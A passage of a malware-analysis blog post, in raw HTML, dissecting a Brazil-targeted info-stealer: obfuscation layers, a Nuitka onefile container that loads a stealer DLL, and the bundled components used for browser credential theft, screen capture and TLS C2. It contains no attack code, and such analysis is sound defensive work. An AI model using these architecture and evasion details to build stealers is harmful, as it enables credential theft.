      >\n                                        String concatenation\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"B6\"\n                    data-col-index=\"1\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Low\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"C6\"\n                    data-col-index=\"2\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Defeats naive string grep but not dynamic analysis\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A7\"\n                    data-col-index=\"0\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        In-memory execution\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"B7\"\n                    data-col-index=\"1\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Medium\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"C7\"\n                    data-col-index=\"2\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Evades file-based\u00a0AV;\u00a0recoverable via memory dump or hook\u00a0                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-295'>\ntable#wpdtSimpleTable-295{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-295 td, table.wpdtSimpleTable295 th { white-space: normal !important; }\n.wpdt-fs-000014 { font-size: 14px !important;}\n.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}\n.wpdt-fs-000012 { font-size: 12px !important;}\n<\/style>\n\n\n\n\n<p>Overall assessment: the obfuscation chain is consistent with the use of publicly available VBS templates or tutorials. The layered approach&nbsp;demonstrates&nbsp;awareness of basic detection mechanisms but no understanding of cryptographic security. The presence of hardcoded keys and deterministic transformations makes full offline payload recovery straightforward for any analyst with access to the script.&nbsp;<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">4. Stage 2 Payload Architecture&nbsp;<\/h4>\n\n\n\n<p>The payload follows a two-component architecture: a lightweight container executable (wifi_driver.exe) and the actual malicious module (agenteV2_historico_detect.dll). These roles must not be confused&nbsp;only&nbsp;the DLL&nbsp;contains&nbsp;malicious logic.&nbsp;<\/p>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-296\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"4\"\n           data-rows=\"3\"\n           data-wpID=\"296\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-bc-03A9F4 wpdt-fs-000014\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:13.667425968109%;                    padding:10px;\n                    \"\n                    >\n                                        Component\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bc-03A9F4 wpdt-fs-000014\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:11.389521640091%;                    padding:10px;\n                    \"\n                    >\n                                        File\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bc-03A9F4 wpdt-fs-000014\"\n                                            data-cell-id=\"C1\"\n                    data-col-index=\"2\"\n                    data-row-index=\"0\"\n                    style=\" width:11.389521640091%;                    padding:10px;\n                    \"\n                    >\n                                        Size\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bc-03A9F4 wpdt-fs-000014\"\n                                            data-cell-id=\"D1\"\n                    data-col-index=\"3\"\n                    data-row-index=\"0\"\n                    style=\" width:63.553530751708%;                    padding:10px;\n                    \"\n                    >\n                                        Role\u00a0                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Container \/ Bootloader\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        wifi_driver.exe\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"C2\"\n                    data-col-index=\"2\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        ~12.6 MB\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"D2\"\n                    data-col-index=\"3\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Onefile\u00a0bundle extracts Python runtime + DLL, then loads and executes the stealer DLL\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Core Stealer Module\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        agenteV2_historico_detect.dll\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"C3\"\n                    data-col-index=\"2\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        ~27 MB\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"D3\"\n                    data-col-index=\"3\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        All malicious logic: C2 resolution, browser credential theft, screen capture, persistence\u00a0                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-296'>\ntable#wpdtSimpleTable-296{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-296 td, table.wpdtSimpleTable296 th { white-space: normal !important; }\n.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}\n.wpdt-fs-000014 { font-size: 14px !important;}\n.wpdt-fs-000012 { font-size: 12px !important;}\n<\/style>\n\n\n\n\n<p><strong>wifi_driver.exe Container\/Bootloader<\/strong>&nbsp;<\/p>\n\n\n\n<p>wifi_driver.exe is a self-contained&nbsp;onefile&nbsp;bundle (PyInstaller&nbsp;or&nbsp;Nuitka&nbsp;container mode). It&nbsp;contains&nbsp;no malicious logic of its own. Its sole purpose is to:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Extract the full Python 3.13 runtime environment to a temporary directory (Temp\\onefile_&lt;PID&gt;_&lt;timestamp&gt;\\);&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Extract all required .pyd&nbsp;extensions and native DLLs alongside the&nbsp;runtime;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Load and execute agenteV2_historico_detect.dll the actual&nbsp;payload;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Clean up the extraction directory on exit.&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"715\" height=\"526\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_5.png\" alt=\"\" class=\"wp-image-20425\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_5.png 715w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_5-300x221.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_5-370x272.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_5-270x199.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_5-80x60.png 80w\" sizes=\"(max-width: 715px) 100vw, 715px\" \/><figcaption class=\"wp-element-caption\"><em>wifi_driver.exe showing&nbsp;Nuitka&nbsp;onefile&nbsp;container signature, PE characteristics, Python 3.13 runtime<\/em><\/figcaption><\/figure>\n\n\n\n<p>wifi_driver.exe is a self-contained onefile bundle (PyInstaller or Nuitka container mode). It contains no malicious logic of its own. Its sole purpose is to:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Extract the full Python 3.13 runtime environment to a temporary directory (Temp\\onefile_&lt;PID&gt;_&lt;timestamp&gt;\\);<\/li>\n\n\n\n<li>Extract all required .pyd extensions and native DLLs alongside the runtime;<\/li>\n\n\n\n<li>Load and execute agenteV2_historico_detect.dll the actual payload;<\/li>\n\n\n\n<li>Clean up the extraction directory on exit.<\/li>\n<\/ul>\n\n\n\n<p><strong>Reverse engineering path for wifi_driver.exe:&nbsp;<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>If&nbsp;PyInstaller: use pyinstxtractor.py to unpack the bundle \u2192&nbsp;locate&nbsp;main.pyc&nbsp;(or file named after the executable) \u2192 decompile with&nbsp;pycdc&nbsp;to recover readable Python&nbsp;source;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>If&nbsp;Nuitka&nbsp;container mode: the bootstrap code is minimal C focus effort on the extracted DLL, not the&nbsp;container;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The container itself is not the analytical&nbsp;target it&nbsp;is merely the delivery mechanism for the DLL.&nbsp;<\/li>\n<\/ul>\n\n\n\n<p>Extracted runtime components dropped to Temp\\onefile_&lt;PID&gt;\\ by wifi_driver.exe:&nbsp;<\/p>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-297\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"3\"\n           data-rows=\"17\"\n           data-wpID=\"297\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-bold wpdt-fs-000014 wpdt-bc-03A9F4\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:27.176781002639%;                    padding:10px;\n                    \"\n                    >\n                                        File\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold wpdt-fs-000014 wpdt-bc-03A9F4\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:13.192612137203%;                    padding:10px;\n                    \"\n                    >\n                                        Size\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold wpdt-fs-000014 wpdt-bc-03A9F4\"\n                                            data-cell-id=\"C1\"\n                    data-col-index=\"2\"\n                    data-row-index=\"0\"\n                    style=\" width:59.630606860158%;                    padding:10px;\n                    \"\n                    >\n                                        Purpose\u00a0                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        python313.dll\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        6 MB\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C2\"\n                    data-col-index=\"2\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Python 3.13 interpreter main runtime\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        python3.dll\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        72 KB\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C3\"\n                    data-col-index=\"2\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Python stable ABI shim\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        vcruntime140.dll\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        118 KB\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C4\"\n                    data-col-index=\"2\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        MSVC runtime (C++ support)\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A5\"\n                    data-col-index=\"0\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        libcrypto-3.dll\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"B5\"\n                    data-col-index=\"1\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        5 MB\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C5\"\n                    data-col-index=\"2\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        OpenSSL crypto TLS for C2 comms\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A6\"\n                    data-col-index=\"0\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        libssl-3.dll\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"B6\"\n                    data-col-index=\"1\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        776 KB\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C6\"\n                    data-col-index=\"2\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        OpenSSL TLS encrypted C2 channel\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A7\"\n                    data-col-index=\"0\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        sqlite3.dll\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"B7\"\n                    data-col-index=\"1\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        2 MB\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C7\"\n                    data-col-index=\"2\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        SQLite engine reading browser credential DBs\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A8\"\n                    data-col-index=\"0\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        _sqlite3.pyd\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"B8\"\n                    data-col-index=\"1\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        128 KB\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C8\"\n                    data-col-index=\"2\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Python SQLite bindings\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A9\"\n                    data-col-index=\"0\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        PIL\/_imaging.pyd\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"B9\"\n                    data-col-index=\"1\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        2 MB\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C9\"\n                    data-col-index=\"2\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Pillow core screen capture\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A10\"\n                    data-col-index=\"0\"\n                    data-row-index=\"9\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        PIL\/_imagingcms.pyd\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"B10\"\n                    data-col-index=\"1\"\n                    data-row-index=\"9\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        264 KB\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C10\"\n                    data-col-index=\"2\"\n                    data-row-index=\"9\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Pillow CMS image processing\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A11\"\n                    data-col-index=\"0\"\n                    data-row-index=\"10\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        psutil\/_psutil_windows.pyd\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"B11\"\n                    data-col-index=\"1\"\n                    data-row-index=\"10\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        69 KB\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C11\"\n                    data-col-index=\"2\"\n                    data-row-index=\"10\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Process enumeration\u00a0kill\u00a0browsers before DB access, anti-VM checks\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A12\"\n                    data-col-index=\"0\"\n                    data-row-index=\"11\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        _wmi.pyd\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"B12\"\n                    data-col-index=\"1\"\n                    data-row-index=\"11\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        39 KB\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C12\"\n                    data-col-index=\"2\"\n                    data-row-index=\"11\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        WMI bindings system fingerprinting (UUID, hostname, OS version)\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A13\"\n                    data-col-index=\"0\"\n                    data-row-index=\"12\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        _ssl.pyd\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"B13\"\n                    data-col-index=\"1\"\n                    data-row-index=\"12\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        178 KB\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C13\"\n                    data-col-index=\"2\"\n                    data-row-index=\"12\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Python SSL bindings HTTPS for C2\/Pastebin\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A14\"\n                    data-col-index=\"0\"\n                    data-row-index=\"13\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        certifi\/cacert.pem\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"B14\"\n                    data-col-index=\"1\"\n                    data-row-index=\"13\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        266 KB\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C14\"\n                    data-col-index=\"2\"\n                    data-row-index=\"13\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Trusted CA bundle validates Pastebin and C2 TLS certs\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A15\"\n                    data-col-index=\"0\"\n                    data-row-index=\"14\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        charset_normalizer\/*.pyd\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"B15\"\n                    data-col-index=\"1\"\n                    data-row-index=\"14\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        22 KB\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C15\"\n                    data-col-index=\"2\"\n                    data-row-index=\"14\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Text encoding detection handles multi-encoding victim data\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A16\"\n                    data-col-index=\"0\"\n                    data-row-index=\"15\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        81d243bd__mypyc.pyd\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"B16\"\n                    data-col-index=\"1\"\n                    data-row-index=\"15\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        205 KB\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C16\"\n                    data-col-index=\"2\"\n                    data-row-index=\"15\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        mypyc-compiled auxiliary module\u00a0additional\u00a0compilation layer\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A17\"\n                    data-col-index=\"0\"\n                    data-row-index=\"16\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        agenteV2_historico_detect.dll\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"B17\"\n                    data-col-index=\"1\"\n                    data-row-index=\"16\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        27 MB\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C17\"\n                    data-col-index=\"2\"\n                    data-row-index=\"16\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Complete\u00a0CORE STEALER malicious logic\u00a0                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-297'>\ntable#wpdtSimpleTable-297{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-297 td, table.wpdtSimpleTable297 th { white-space: normal !important; }\n.wpdt-fs-000014 { font-size: 14px !important;}\n.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}\n.wpdt-fs-000012 { font-size: 12px !important;}\n<\/style>\n\n\n\n\n<p><strong>agenteV2_historico_detect.dll Core Stealer (Nuitka)<\/strong>&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"715\" height=\"524\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_6.png\" alt=\"\" class=\"wp-image-20435\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_6.png 715w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_6-300x220.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_6-370x271.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_6-270x198.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_6-80x60.png 80w\" sizes=\"(max-width: 715px) 100vw, 715px\" \/><figcaption class=\"wp-element-caption\"><em>agenteV2_historico_detect.dll confirming&nbsp;Nuitka&nbsp;compilation, native PE DLL, no extractable bytecode<\/em><\/figcaption><\/figure>\n\n\n\n<p>This DLL is the analytical target it&nbsp;contains&nbsp;all malicious logic. The original Python source was compiled with&nbsp;Nuitka&nbsp;(Python \u2192 C++ \u2192 native machine code), producing a monolithic 27 MB PE DLL with no extractable bytecode.&nbsp;pyinstxtractor&nbsp;and uncompyle6 do not apply here.<\/p>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-298\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"2\"\n           data-rows=\"9\"\n           data-wpID=\"298\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-fs-000014 wpdt-bold wpdt-bc-03A9F4\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:16.551724137931%;                    padding:10px;\n                    \"\n                    >\n                                        Property\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-fs-000014 wpdt-bold wpdt-bc-03A9F4\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:83.448275862069%;                    padding:10px;\n                    \"\n                    >\n                                        Value\u00a0                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Compiler\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Nuitka\u00a0(Python \u2192 C++ \u2192 native machine code)\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012\"\n                                            data-cell-id=\"A3\"\n                    